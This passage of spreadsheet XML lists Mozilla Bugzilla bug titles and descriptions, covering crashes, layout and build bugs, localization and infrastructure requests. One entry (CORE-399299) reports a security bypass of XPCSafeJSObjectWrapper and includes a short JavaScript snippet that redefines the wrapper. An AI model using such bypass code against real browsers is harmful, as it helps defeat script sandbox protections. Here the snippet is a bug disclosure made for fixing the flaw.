Graydon you understand the allocator lifetimes... any idea what's going on here?  The LirNameMap is using 'alloc' as its allocator whereas the LirBuffer is using 'tempAlloc'.  I thought they should use the same one because the lifetime of a LIR fragment should match the lifetime of its LirNameMap.  So I tried changing LirNameMap to use 'tempAlloc' but I got crashes and Valgrind diagnoses bazillions of use-after-free errors.  Then I tried changing LirBuffer to use 'alloc' and the problem goes away but that extends the LirBuffer's lifetime inappropriately I think.</t>
  </si>
  <si>
    <t>TOOLKIT-298665</t>
  </si>
  <si>
    <t>color picker is broken (popup doesn't close after selecting a color)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 fr rv:1.8b2) Gecko/20050621 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Win98 fr rv:1.8b2) Gecko/20050621 Firefox/1.0+
After selecting a color colorpicker popup doesn't want to close...
Reproducible: Always
Steps to Reproduce:
1. click the colopicker button
2. select a color in the colorpicker popup
3. note the bug
Actual Results:  
nothing
Expected Results:  
Colorpicker popup should close</t>
  </si>
  <si>
    <t>appertj</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-351263</t>
  </si>
  <si>
    <t>Dialog steals focus while navigating combobox in subscription options on feed preview pane</t>
  </si>
  <si>
    <t>1. Preview a feed such as http://www.mozillazine.org/contents.rdf
2. Tab to document
3. Tab to Subscribe to this feed using combo box.
4. Press down arrow.
A dialog opens up and shouldn't</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-130442</t>
  </si>
  <si>
    <t>Networking: NNTP</t>
  </si>
  <si>
    <t>Crash in [@ nsNntpCacheStreamListener::OnStartRequest(nsIRequest* nsISupports*)] closing stand-alone windows.</t>
  </si>
  <si>
    <t>Build ID: 2002-03-12-08 Linux RedHat 7.2
Summary: Crash in [ @ nsNntpCacheStreamListener::OnStartRequest] closing
stand-alone windows.
Steps to Reproduce:
DISCLAIMER: Not very reproducable and the server was being extremely slow when
I was doing this so bear with me.
1.  Double-click on multiple news postings.
2.  Before they come up entirely close their windows.
Expected Results:
Window should close.
Actual Results:
Crash in nsNntpCacheStreamListener::OnStartRequest</t>
  </si>
  <si>
    <t>stephend</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-493623</t>
  </si>
  <si>
    <t>p-m having issues posting to graphs.m.o</t>
  </si>
  <si>
    <t>Production-master is timing out posting to graphs.m.o.
Talos looks like it's reporting there ok. Not sure why this is.
 - graphs.m.o is slow to load for me though I'm not sure if that's more than normal or not.
 - production-master had issues this morning and had to be kicked.
 - odd DHCPREQUESTs in production-master:/var/log/messages
 - uh
[13:42]		[51] dm-graphs01:avg load is WARNING: WARNING - load average: 18.12 23.93 22.51
That might possibly be the culprit.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-304782</t>
  </si>
  <si>
    <t>no build logs for Mozilla1.8-l10n-[ab-CD]</t>
  </si>
  <si>
    <t>The links to the builds logs on 
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla1.8-l10n-de or
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla1.8-l10n-nl
are empty we need those to fix our localized releases.
pl has the same problem didn't check all the other locales.</t>
  </si>
  <si>
    <t>CORE-288574</t>
  </si>
  <si>
    <t>[FIXr]Don't call ValueAppended for DOM changes that don't create the value</t>
  </si>
  <si>
    <t>This is spun off of bug 208727 comment 1.  On the testcase at
http://www.speich.net/computer/3d.php the patch I'll post to implement this cuts
our time in TransferTempData by a factor of 5 (from about 1% of total time to
about 0.2%).
Given that this also gives better behavior with editor in general (per bug
208727 comment 2) I think it's worth the bit of extra code.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-516916</t>
  </si>
  <si>
    <t>buildslave reboots 20090916</t>
  </si>
  <si>
    <t>Lots of minis for reboot today:
 qm-pleopard-try01
 talos-rev1-linux03
 talos-rev1-vista04
 talos-rev2-linux13
 talos-rev2-linux16
 talos-rev2-linux17
 talos-rev2-linux18
 talos-rev2-vista03
 talos-rev2-xp05</t>
  </si>
  <si>
    <t>MOZILLA.ORG-468120</t>
  </si>
  <si>
    <t xml:space="preserve">Hg Account Request - Ben Galbraith </t>
  </si>
  <si>
    <t>Can I have a Subversion account to access the repository mentioned in bug 468116? Thanks</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-386674</t>
  </si>
  <si>
    <t>Graph Server</t>
  </si>
  <si>
    <t>Ability to resize graphs</t>
  </si>
  <si>
    <t>Graphs are currently stuck at a set size and can't be resized. Should be able to drag the corners of the graphs and pull to a larger size or at least be able to choose from a few pre-set dimensions.</t>
  </si>
  <si>
    <t>CORE-497846</t>
  </si>
  <si>
    <t>[HTML5][Patch] 311366-unknown-block-3.html fails</t>
  </si>
  <si>
    <t>http://mxr.mozilla.org/mozilla-central/source/layout/reftests/bugs/311366-unknown-block-3.html fails on tryserver. Can't see the difference locally.</t>
  </si>
  <si>
    <t>hsivonen</t>
  </si>
  <si>
    <t>CORE-70828</t>
  </si>
  <si>
    <t>Tags that are not closed by the end of the document do strange things.</t>
  </si>
  <si>
    <t xml:space="preserve">I created a simple HTML file:
I opened the file up in Mozilla 0.8 under Win2K and went to View Page Source. 
I expected to see the same HTML code that I typed in despite the fact that the
HTML code contained errors.  Instead some of the double-quotes got cleaned up:
     </t>
  </si>
  <si>
    <t>ericmao</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-448991</t>
  </si>
  <si>
    <t>Set MOZ_CRASHREPORTER_NO_REPORT=1 for mercurial builds</t>
  </si>
  <si>
    <t>Created attachment 332158
[checked in] Set MOZ_CRASHREPORTER_NO_REPORT on mozilla-central build &amp; leak test actionmonkey and tracemonkey builds
Recently moz2-win32-slave1 got into a state where the crashreporter was running from an (unknown) error and subsequent builds burned with these messages:
/d/mozilla-build/moztools/bin/nsinstall -m 755 crashreporter.exe ../../../dist/bin
nsinstall: cannot copy crashreporter.exe to ..\..\..\dist\bin\crashreporter.exe: The process cannot access the file because it is being used by another process.
This was a debug build with XPCOM_DEBUG_BREAK set to stack-and-abort. If we also set MOZ_CRASHREPORTER_NO_REPORT to 1 then the crashreporter won't fire. This patch does that on all platforms for tinderbox parity the mercurial unittest machines already have this set by the looks.</t>
  </si>
  <si>
    <t>SEAMONKEY-431684</t>
  </si>
  <si>
    <t>Have navigator/tabbrowser close menu items have separate accesskeys</t>
  </si>
  <si>
    <t>updateCloseItems() in navigator.js updates the File &gt; Close menu item label with different texts for tabbed and untabbed windows depending on tabbrowser status. For L10n purposes we should pair setting this label with also setting the accesskey because we can't guarantee that the global close accesskey from platformCommunicatorOverlay fits with both navigator.properties labels in all languages and even less for localizers to know that an accesskey from there applies to the strings here.
To play nice with L10n tools (pairing labels with accesskeys) it might be good to change the ID for the labels to end in .label at the same time.</t>
  </si>
  <si>
    <t>CORE-522570</t>
  </si>
  <si>
    <t>TM: Assertion failure: JSVAL_IS_INT(v) on babelgum</t>
  </si>
  <si>
    <t>Now that bug 522520 is fixed I'm hitting
Assertion failure: JSVAL_IS_INT(v) at /Users/jruderman/tracemonkey/js/src/jsapi.h:242</t>
  </si>
  <si>
    <t>dvander</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-58118</t>
  </si>
  <si>
    <t>ECMA Compliance: daylight savings time wrong prior to year 1</t>
  </si>
  <si>
    <t>Rhino computes daylight savings time wrong for years before 1AD
It appears to never recognize daylight savings time before year 1.
oxymoron:44 % java -jar js.jar
js&gt; d = new Date(20006)
Sat Jul 01 00:00:00 GMT-0700 (PDT) 2000
js&gt; d.setFullYear(1900)                  
-2193325200000
js&gt; d
Sun Jul 01 00:00:00 GMT-0700 (PDT) 1900
js&gt; d.setFullYear(0)
-62151465600000
js&gt; d
Sat Jul 01 00:00:00 GMT-0800 (PST) 0000
js&gt; d.setFullYear(-1000)
-93708460800000
js&gt; d
Tue Jul 01 00:00:00 GMT-0800 (PST) -1000
js&gt; d.getTimezoneOffset()
480
js&gt; d.setFullYear(2000)
962434800000
js&gt; d
Sat Jul 01 00:00:00 GMT-0700 (PDT) 2000
js&gt; d.getTimezoneOffset()
420
See section 15.9.1.8 of the ECMA v3 spec which says that the daylight
savings time adjustment should be applied to all dates regardless of year.
That is there should be no attempt to track the actual historical definitions
and adoption of daylight savings time.
See also bug #58116: spidermonkey has a similar bug for years before 1970</t>
  </si>
  <si>
    <t>CORE-502788</t>
  </si>
  <si>
    <t>nanojit: avoid many redundant NULL comparisons in the LirReader pipeline</t>
  </si>
  <si>
    <t>Created attachment 387136
patch
The termination condition in the LirReader pipeline is when the returned LInsp is NULL.  This means that the first thing every step in the pipeline does is a NULL check.  Lots of redundancy.
The attached patch changes the termination condition to opcode==LIR_start.  This means that the stages in the pipeline no longer need to test against NULL.  It also means the pipeline is one instruction shorter (because you stop on LIR_start not after it).
It's a clear win in the number of instructions executed but doesn't make any measurable time difference for SunSpider probably because the NULL tests are highly predictable.  (It doesn't help that NJ compilation time is maybe 10--15% of overall SunSpider time.) 
I'm wondering what is the fate of such patches -- are they worth committing in the hope that they might make a difference on some other machine or in the future after some other changes have been made?  Or do they just wither and die?</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-362101</t>
  </si>
  <si>
    <t>Provide a way for regular users to display their own search results</t>
  </si>
  <si>
    <t>Tomcat: how can a normal user search for his results ?
Tomcat: as admin this is easy  but how can this a normal user 
Tomcat: because i will also create a Litmus FAQ Section and i bet that someone has this question 
coop: regular users can't currently do that which is probably an oversight
coop: i don't think we want regular users to have access to the entire list of email addresses like admins but there should be a checkbox on the advanced search form to show only the results from that user
coop: does that make sense?
Tomcat: yep make sense 
Tomcat: results search only for the user himself and not for other
Tomcat: as privacy and spam protection
coop: yeah</t>
  </si>
  <si>
    <t>NSS-125796</t>
  </si>
  <si>
    <t>client auth with requested cert leaks cert references</t>
  </si>
  <si>
    <t>Running a server that requests client auth with a client that searches for a
suitable cert to send (selfserv -r strsclnt -n none) causes cert references to
be leaked on occasion (not every time).  This does not happen when the client
specifies a cert (strsclnt -n ) so it appears to be a timing issue with
how CERT_GetCertNicknames is used.
This seems to be different than previously reported client auth leak bugs.  It
only happens with chained certs.  In general it would only cause a leak in an
environment where many different clients present differing cert chains causing
cache bloat.  That is not the case with any of our tests.</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-340157</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD</t>
  </si>
  <si>
    <t>file selection on flicker upload page not working.</t>
  </si>
  <si>
    <t>1. login to a flicker account
2. go to the upload page at http://flickr.com/photos/upload
3. the six file entry dialogs are skwished down to a single character and the browse button does't open the Windows Mobile file manager to help locate files on your mobile device.  
The combination of these makes uploading files to flickr un-usable.
Doug mentioned that some/all might be fixable in css.  I see this in both single column and desktop mode</t>
  </si>
  <si>
    <t>CORE-181711</t>
  </si>
  <si>
    <t>A pref to not convert Arabic Numerals to Hindi</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021120
Testcase URL is an example from Bug 82347. The bug occurs with the default
mozilla numeral setting (regularcontextnumeralBidi) and the Testcase renders
correctly in IE6.
TO REPRODUCE:
1. Go to http://bugzilla.mozilla.org/attachment.cgi?id=54477&amp;action=view
2. Look at the second example (2nd line)
ACTUAL :  Arabic letters followed by Hindi numerals
EXPECTED :  Arabic letters followed by Arabic numerals</t>
  </si>
  <si>
    <t>neokuwait</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-361794</t>
  </si>
  <si>
    <t>Give Core::xpidl a better default assignee/QA contact</t>
  </si>
  <si>
    <t>This is similar to bug 334198/bug 359070. The default assignee for Core:xpidl should be nobody@mozilla.org and a generic default QA contact account needs to be created to replace pschwartau@meer.net (per bug 334198 comment 4). I suggest xpidl@core.bugs.</t>
  </si>
  <si>
    <t>FIREFOX-524111</t>
  </si>
  <si>
    <t>Weave does not sync bookmarks (FastDial -&gt; NS_ERROR_MALFORMED_URI)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Build Identifier: 0.8pre2
Hello
when i try to sync my bookmarks with weave weave runs through without any error but the bookmarks are not beeing synced.
In the activity Log i see the following issue.
Engine.Bookmarks     DEBUG	Event: weave:engine:sync:start
Engine.Bookmarks     DEBUG	Ensuring server crypto records are there
Engine.Bookmarks     INFO	First sync uploading all items
Engine.Bookmarks     INFO	123 outgoing items pre-reconciliation
Engine.Bookmarks     DEBUG	Downloading &amp; applying server changes
Engine.Bookmarks     INFO	Records: 0 applied 0 reconciled 0 left to fetch
Engine.Bookmarks     DEBUG	Preparing 123 outgoing records
Store.BStore         DEBUG	No predecessor directly before 59 under 2 at -1
Store.BStore         DEBUG	Fixing 59 to be at position -1
Engine.Bookmarks     WARN	Sync failed
Engine.Bookmarks     DEBUG	Event: weave:engine:sync:error
Engine.Bookmarks     INFO	Total (ms): sync 8 processIncoming 0 uploadOutgoing 1 syncStartup 6 makeUploadColl 0 createRecord 1
Service.Main         DEBUG	Component returned failure code: 0x80070057 (NS_ERROR_ILLEGAL_VALUE) [nsINavBookmarksService.getItemGUID] Stack trace: GUIDForId()@bookmarks.js:82  &lt; batchedSync()@util.js:142 &lt; anonymous()@engines.js:198 &lt; WrappedNotify()@util.js:115 &lt; Engine_sync()@engines.js:208 &lt; WeaveSvc__syncEngine()@service.js:1158 &lt; anonymous()@service.js:1099 &lt; WrappedNotify()@util.js:115 &lt; WrappedLock()@util.js:87 &lt; WrappedCatch()@util.js:66 &lt; sync()@service.js:1038 &lt; anonymous()@status.js:96
Engine.Forms         DEBUG	Event: weave:engine:sync:start
Engine.Forms         DEBUG	Ensuring server crypto records are there
Engine.Forms         INFO	6 outgoing items pre-reconciliation
Engine.Forms         DEBUG	Downloading &amp; applying server changes
Engine.Forms         INFO	Records: 0 applied 0 reconciled 0 left to fetch
Engine.Forms         DEBUG	Preparing 6 outgoing records
Engine.Forms         INFO	Uploading all of 6 records
Collection           DEBUG	POST Length: 1447
Collection           DEBUG	POST request for https://sj-weave08.services.mozilla.com/0.5/rokn/storage/forms
Collection           DEBUG	POST success: 200
Engine.Forms         DEBUG	Event: weave:engine:sync:finish
Engine.Forms         INFO	Total (ms): sync 993 processIncoming 0 uploadOutgoing 973 syncStartup 20 syncFinish 0 makeUploadColl 0 createRecord 0
Service.Main         WARN	Some engines did not sync correctly
I'm using Firefox 3.5.3 Windows XP SP3 and was not able to find a solution for this behaviour. Resetting bookmarks.lastsync in about:config did not solve the problem. This field is still string and not date.
Reproducible: Always
Steps to Reproduce:
1. I configure Weave with my account pw secret and the mozilla weave server.
2. I only want to sync bookmarks.
3. I try to sync via weave.
Actual Results:  
Weave does not crash but also does not sync bookmarks.</t>
  </si>
  <si>
    <t>CORE-505663</t>
  </si>
  <si>
    <t>nsCanvasRenderingContextGL* build failure after bug 753 fixed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 ja-JP rv:1.9.2a1pre) Gecko/20090722 Fedora/3.6a1pre-0.a1pre.2009072116.hg_d3e0648a5d54.fc11 Minefield/3.6a1pre
Build Identifier: 
This bug is from bug 753 comment #102.
We also remove gfxIImageFrame.h and nsIImage.h from files below:
content/canvas/src/nsCanvasRenderingContextGL.cpp
content/canvas/src/nsCanvasRenderingContextGL.h
content/canvas/src/nsCanvasRenderingContextGLWeb20.cpp
Reproducible: Always</t>
  </si>
  <si>
    <t>t.matsuu</t>
  </si>
  <si>
    <t>CORE-201167</t>
  </si>
  <si>
    <t>No CTL support in StaticBuilds</t>
  </si>
  <si>
    <t>Phoenix 0.5+ 2003-04-07-08-trunk build on Solaris/SPARC
(http://ftp.mozilla.org/pub/phoenix/nightly/2003-04-07-08-trunk/phoenix-sparc-sun-solaris2.7-static.tar.gz).
Viewing the new Thai version of the MathML start demo page
(http://www.mozilla.org/projects/mathml/start-thai.xml) shows weired layout -
and in the shell the following warnings:
-- snip --
Cannot load module libmozpango-thaix.so: ld.so.1: ./phoenix-bin: fatal: libmozpa
ngo-thaix.so: open failed: No such file or directory
-- snip --
The tarball does not contain this shared library and I would have expect that in
a staticbuild (the Phoenix nightlies on Solaris are staticbuilds) only consists
of one large single monster-size binary which does not depend on modules
shipped as shared libraries.</t>
  </si>
  <si>
    <t>CORE-120891</t>
  </si>
  <si>
    <t>TestProtocols includes unneeded nsICookieService.h header</t>
  </si>
  <si>
    <t>myotonic is red becauseit build w/o extentions but TestProtocols includes
cookies headers. The code which uses it if #ifdef'd out. I'll attach a patch
which just removes it.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-433984</t>
  </si>
  <si>
    <t>Treehydra: Need way to iterate variables within an ESP state</t>
  </si>
  <si>
    <t>Created attachment 321185
Variable iteration
Not sure if this is ideal but it's certainly the simplest way.
 Perhaps should return varible + value? While at it should also return blame? Yet blame would require an extra map call even when analyses don't care for it</t>
  </si>
  <si>
    <t>CORE-223151</t>
  </si>
  <si>
    <t>nsJSProtocolHandler::Suspend and ::Resume not implemented</t>
  </si>
  <si>
    <t>Looking at the code it seems like Suspend could be implemented as |return
mStreamChannel-&gt;Suspend()| and Resume as |return mStreamChannel-&gt;Resume()|</t>
  </si>
  <si>
    <t>CALENDAR-411280</t>
  </si>
  <si>
    <t>Provider: GData</t>
  </si>
  <si>
    <t>Make sure EXDATEs are specified in UTC</t>
  </si>
  <si>
    <t>Created attachment 295945
Make sure EXDATEs are specified in UTC
Currently when creating an exdate the timezone is specified as a /mozilla.org one. It is better (for now?) if the exdate is specified in UTC since timezone conversion is not needed.
Also remove the extra newline that was being passed between every rule.</t>
  </si>
  <si>
    <t>CORE-518272</t>
  </si>
  <si>
    <t>Namoroka - datepicker (type=popup) within a  not displaying properly after dropmarker clicked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1) Gecko/20090806 Namoroka/3.6a1 (.NET CLR 3.5.30729)
In this situation after dropmarker clicked the first two subfields of datepicker box display higher (and partly out of the box) than the third subfield.
Attachments to show problem.
Reproducible: Always
Steps to Reproduce:
1. Open the attached XUL file in browser
2. Click the dropmarker
3.
Actual Results:  
22 09
  /  / 2009
(not quite this pronounced)
Expected Results:  
22/09/ 2009</t>
  </si>
  <si>
    <t>grbradt</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-492298</t>
  </si>
  <si>
    <t>[tracking] Buildbot maintenance: Monday May 11th 2009</t>
  </si>
  <si>
    <t>3PM PST Monday May 11th 2009</t>
  </si>
  <si>
    <t>CORE-521309</t>
  </si>
  <si>
    <t>ExecuteTree arena path is slow</t>
  </si>
  <si>
    <t>bug 520321 comment #14 shows that ExecuteTree is spending way too much time allocating memory. This is exacerbated by recursion which ups the memory requirements of entering traces.</t>
  </si>
  <si>
    <t>CORE-107514</t>
  </si>
  <si>
    <t>Regression in the support of Symbol fonts</t>
  </si>
  <si>
    <t>While renaming APIs in bug 102088 I discovered that a regression went in during 
bug 102706:
Symbol characters now display as white rectangles.
STEPS TO REPRODUCE:
 Load the URL above
EXPECTED RESULTS
  Symbol glyphs should display properly
ACTUAL RESULTS
  Symbol characters display as white rectangles
ADDITIONAL INFO
  The part of the patch where the regression seems to happen is shown below.
  In the previous code the 'fontType' was also cached in the hashtable so that  
  if the font is found again later then that same type is used.
  Now it isn't cached in the hashtable anymore so that a Symbol font could be
  instantiated later as a |Unicode font| instead of as a |nonUnicode font|. The  
  bug is critical for MathML as all symbolic MathML glyphs now render as white
  rectangles.
@@ -135743 +124620 @@
         if (aFontType) {
           *aFontType = eFontType_NonUnicode
         }
-        if (!FillMap(aShortName map)) {
-          PR_Free(map)
-          map = gEmptyMap
-        }
         PR_Free(buf)
-
-        // XXX Need to check if an identical map has already been added - Bug 
75260
-        NS_ASSERTION(hep bad code)
-        he = PL_HashTableRawAdd(gFontMaps hep hash name nsnull)
-        if (he) {
-          info = NS_STATIC_CAST(nsFontInfo* he)
-          info-&gt;mCharset = SYMBOL_CHARSET
-          info-&gt;mType = eFontType_NonUnicode
-          info-&gt;mMap = map
-          he-&gt;value = info    // so PL_HashTableLookup returns an nsFontInfo*
-          return map
-        }
-        delete name
-        if (map != gEmptyMap)
-          PR_Free(map)
-        return nsnull
+        return GetCCMapThroughConverter(aShortName)</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-913791</t>
  </si>
  <si>
    <t>pl / Polish</t>
  </si>
  <si>
    <t>[pl] Localization of snippets for September</t>
  </si>
  <si>
    <t>Hi
we have a few more snippets to localize for September. 
Since we're still trying to find the right format to manage these snippets (also waiting for a specific webapp) let me know if I shouldn't CC some of you to the bug if I should CC other members of your team assign it to a specific person if you prefer an email with a reminder and I'll try to keep it in mind for the next time. 
Your locale probably had some other snippets to localize in the last months we're trying to schedule them once a month to minimize the bug noise.
Thanks again for the great work :-)
Please add your localization in the bug's comments.
********
Take some shortcuts and perform tasks faster. Learn the keyboard shortcuts in Firefox .
We have a winner! (Actually we have 9 of them.) Watch all the winning videos from Firefox Flicks 2013. 
If you use Firefox you're part of our community. And if you're part of our community like us on Facebook or follow us on Twitter.
Love Firefox? Then like us on Facebook. (For love just click extra hard.)
Proud Firefox user? Then shout it from the rooftops! Or at least share this  with the world.
********</t>
  </si>
  <si>
    <t>francesco.lodolo</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-64031</t>
  </si>
  <si>
    <t>nsHelperApp dialog fails</t>
  </si>
  <si>
    <t>Using any browser that embeds mozilla via gtkmozembed and trying to download
anything from gtk.themes.org for example or any site that redirects to a script
causes a failure in showing the HelperAppDialog and the following message appears:
nsHelperAppLauncherDialog error: [Exception... Failure  code: -2147467259
nsresult: 0x80004005 (NS_ERROR_FAILURE)  location:
chrome://global/content/dialogOverlay.js Line: 69]
for an example go to gtk.themes.org click on any theme then click on its quick
download link.</t>
  </si>
  <si>
    <t>muhri</t>
  </si>
  <si>
    <t>SEAMONKEY-216926</t>
  </si>
  <si>
    <t>need correctness fixes for newer g++</t>
  </si>
  <si>
    <t>I've got a small patch to fix a couple of small problems that newer gccs whine
about.</t>
  </si>
  <si>
    <t>CORE-972713</t>
  </si>
  <si>
    <t>Inactive layer construction can behave in strange ways</t>
  </si>
  <si>
    <t>A few patches coming up.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-403978</t>
  </si>
  <si>
    <t>Would like an extra power cord for macbook pro</t>
  </si>
  <si>
    <t>Hi it'd be great to have an extra power cord for the macbook pro - one for home one for the office.
thanks
clint</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-466636</t>
  </si>
  <si>
    <t>gloda event driven indexing tries to index non-offline mail messages</t>
  </si>
  <si>
    <t>Created attachment 349945
v1 make sure event-driven indexing obeys offline requirements
davida sid0 and myself noted gloda getting angry about streaming some messages.  Cursory investigation showed that although the folder indexing logic avoids trying to index messages that are not available offline the event driven indexing code does not have the same qualms.
I am providing a patch that adds this check.  There is obviously some relationship between this change and the recent changes about what folders gloda should be indexing in and this logic should arguably be centralized with that logic more explicitly.  However we are going to drop the offline requirement for beta 2 so I think I can make a strong case for fixing this now and leaving the super elegant code for that change since this code will become moot.</t>
  </si>
  <si>
    <t>CALENDAR-340984</t>
  </si>
  <si>
    <t>strict warnings in calItemBase.js and calAlarmService.js</t>
  </si>
  <si>
    <t>JavaScript strict warnings in calItemBase.js and calAlarmService.js
Warning: trailing comma is not legal in ECMA-262 object initializers
Source File: file:///Y:/sb/dist/bin/components/calItemBase.js
Line: 470 Column: 4
Source Code:
    }
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/calendar/base/src/calItemBase.js&amp;rev=1.62&amp;mark=469#453
Warning: variable duration hides argument
Source File: file:///Y:/sb/dist/bin/components/calAlarmService.js
Line: 196 Column: 12
Source Code:
        var duration = datetime.subtractDate(alarmTime)
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/calendar/base/src/calAlarmService.js&amp;rev=1.17&amp;mark=196197#180</t>
  </si>
  <si>
    <t>CORE-399299</t>
  </si>
  <si>
    <t>Bypassing XPCSafeJSObjectWrapper by redefining XPCSafeJSObjectWrapper</t>
  </si>
  <si>
    <t>This is trunk only.
XPCSafeJSObjectWrapper has the same problem as XPCNativeWrapper (bug 399298).
XPCSafeJSObjectWrapper = function() {}
XPCSafeJSObjectWrapper.prototype = x</t>
  </si>
  <si>
    <t>CORE-515749</t>
  </si>
  <si>
    <t>TM: lazily load stack slots and global values</t>
  </si>
  <si>
    <t>We currently emit a ton of loads at the top of the trace (loop) causing register pressure forcing us to spill many of those loads straight back onto the stack. Instead we should emit the loads on demand and closer to the first use.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-433741</t>
  </si>
  <si>
    <t>search translation in current locale + en-US only</t>
  </si>
  <si>
    <t>Right now text search is slow because we search the translations table for all
strings in all translation rather than just the current locale + english.
This bug is to restrict search to current locale +en-US</t>
  </si>
  <si>
    <t>cpollett</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-337570</t>
  </si>
  <si>
    <t>Description field in BookmarksInfoPanel.nib has no focus ring when active</t>
  </si>
  <si>
    <t>The Description text field in the Bookmarks Info panel (in both bookmark view and folder view) has no focus ring when it is focused.
Putting this blocking bug 325880 because it's been suggested it might just be a nib change....</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-355743</t>
  </si>
  <si>
    <t>(1.8.0 0.7 nightly) select not showing items</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
(1.8.0 0.7 nightly) Items inside a select or select1 are not shown in the detail view of master/detail constructions when the ref attribute of the select reffers to an index in another instance like:
   ... 
Reproducible: Always</t>
  </si>
  <si>
    <t>federico.gimenez</t>
  </si>
  <si>
    <t>FIREFOX-348079</t>
  </si>
  <si>
    <t>Finalize RSS Handlers for en-US</t>
  </si>
  <si>
    <t>Chris tells me that you're on the hook for finalizing (with John) the list of en-US RSS handlers for en-US.
Please let me know when that process is finished.  As soon as we have that list we can notify localizers of their duties.</t>
  </si>
  <si>
    <t>CORE-66965</t>
  </si>
  <si>
    <t>meta: PNG decoding bugs</t>
  </si>
  <si>
    <t>meta bug for png decoding bugs</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-280368</t>
  </si>
  <si>
    <t>Support attribute-based repeats (first step)</t>
  </si>
  <si>
    <t>We need to support something like:
...
When implementing remember that  and index() should still work and
refers to the @id on the element with the attributes (tab in the above).</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-330946</t>
  </si>
  <si>
    <t>Can drag bookmarks into address book collection of Show All Bookmarks</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.2) Gecko/20060310 Camino/1.0.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.2) Gecko/20060310 Camino/1.0.0+
This is bad. It makes no sense to do so and after you do you cannot delete them. Quitting and relauching Camino gets rid of them.
Reproducible: Always
Steps to Reproduce:
1. Drag bookmarks (or maybe copy and paste as well) to the address book section.
2. Ow.
3.
Expected Results:  
Told me I'm an idiot for trying to do this.</t>
  </si>
  <si>
    <t>CALENDAR-182880</t>
  </si>
  <si>
    <t>[patch] multi day all day events are not saved into ical file.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2b) Gecko/20021016
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2b) Gecko/20021016
If you create an event that lasts all day and runs for several days it will show
up fine but as soon as Calendar re-reads the ical file the event becomes a
single day event (checking &amp; unchecking the calendar does this.)
Reproducible: Always
Steps to Reproduce:
1. Create new event in My Calendar lasting all day and for more than one day.
2. Uncheck My Calendar
3. Check My Calendar
Actual Results:  
Event becomes single day event.
Thanks to Joshua Eddy  for finding this bug.</t>
  </si>
  <si>
    <t>buckett</t>
  </si>
  <si>
    <t>CORE-361808</t>
  </si>
  <si>
    <t>Print selection doesn't print selected text</t>
  </si>
  <si>
    <t>Very straightforward to reproduce: just select all on a webpage go to print and select selection.  The output doesn't show any text.
This bug is a regression from the change to ua.css in bug 355395.</t>
  </si>
  <si>
    <t>printing</t>
  </si>
  <si>
    <t>NSS-301259</t>
  </si>
  <si>
    <t>signtool Usage message is unhelpful</t>
  </si>
  <si>
    <t>The signtool documentation that once existed on developer.netscape.com is 
now all gone.  All we have left is the Usage message in the tool itself
and that is very unhelpful.  The usage message cites non-existant URLs for
documentation and it gives examples that use otherwise undocumented options
as modifiers.  Today one cannot even determine the distinct operations that 
the tool can perform from the Usage message.  This needs urgent attention.
The Usage message needs to 
- document EVERY option known to signtool
- separate the command options (which specify the operation to be performed)
  from the modifier options that merely supply file names or info about 
  variants on how to perform the operation.
- document which options are required for each operation e.g. cert nickname
  is likely required for signing but not for JAR signature verification.
The usage message should not cite urls from netscape.com any longer.
After reading the usage message the reader should easily be able to 
- list the operations that the tool can perform
- know which options are required for each of those operations.  
The existing usage message states that every command requires a positional
parameter which is a directory-tree but the -v and -w commands take an
an argument that is a jar file name not a directory tree name.  So that
usage summary is wrong.  
If there are any commands that can operate from EITHER a jar file or a 
